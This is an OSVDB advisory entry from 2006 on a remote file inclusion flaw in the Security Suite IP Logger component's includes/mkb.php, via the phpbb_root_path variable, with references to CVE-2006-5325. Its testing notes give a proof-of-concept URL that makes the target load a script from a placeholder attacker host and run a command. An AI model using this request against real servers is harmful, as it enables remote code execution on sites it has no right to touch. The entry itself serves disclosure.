Security Suite IP Logger includes/mkb.php phpbb_root_path Variable Remote File Inclusion

2006-10-12T22:05:16
ID OSVDB:32413
Type osvdb
Reporter OSVDB
Modified 2006-10-12T22:05:16

Description

Manual Testing Notes

http://[target]/[path]/includes/mkb.php?phpbb_root_path=http://[attacker]/c-h.v2.txt?ls

References:

Related OSVDB ID: 32415 Related OSVDB ID: 32414 Related OSVDB ID: 32416 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0184.html CVE-2006-5325